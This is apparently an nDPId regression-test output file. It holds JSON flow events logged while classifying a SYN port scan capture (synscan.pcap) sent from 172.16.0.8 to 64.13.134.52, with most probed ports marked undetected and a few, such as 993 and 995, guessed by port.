+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3030,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":339,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":987,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1287,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1099,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":992,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"IMAPS","breed":"Safe","category":"Email"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"POPS","breed":"Safe","category":"Email"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 